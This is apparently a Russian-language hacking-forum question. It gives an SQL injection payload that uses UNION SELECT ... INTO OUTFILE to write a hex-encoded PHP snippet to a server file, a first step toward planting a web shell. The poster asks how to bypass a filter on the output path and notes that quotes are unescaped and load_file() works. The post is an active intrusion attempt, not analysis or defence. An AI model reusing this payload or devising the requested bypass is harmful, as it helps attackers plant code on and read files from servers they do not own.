есть запрос на заливку такого типа:

+%75nion+%73elect+1,2,0x3c3f20706870696e666f28293b 203f3e,4,5,6,7+%69nto+%6futfile+'/tmp/1.txt'+--+

там где /tmp/1.txt фильтруется, что сдесь можно придумать?

кавычки не фильтруются и не экранируются, load_file() так же работает нормально.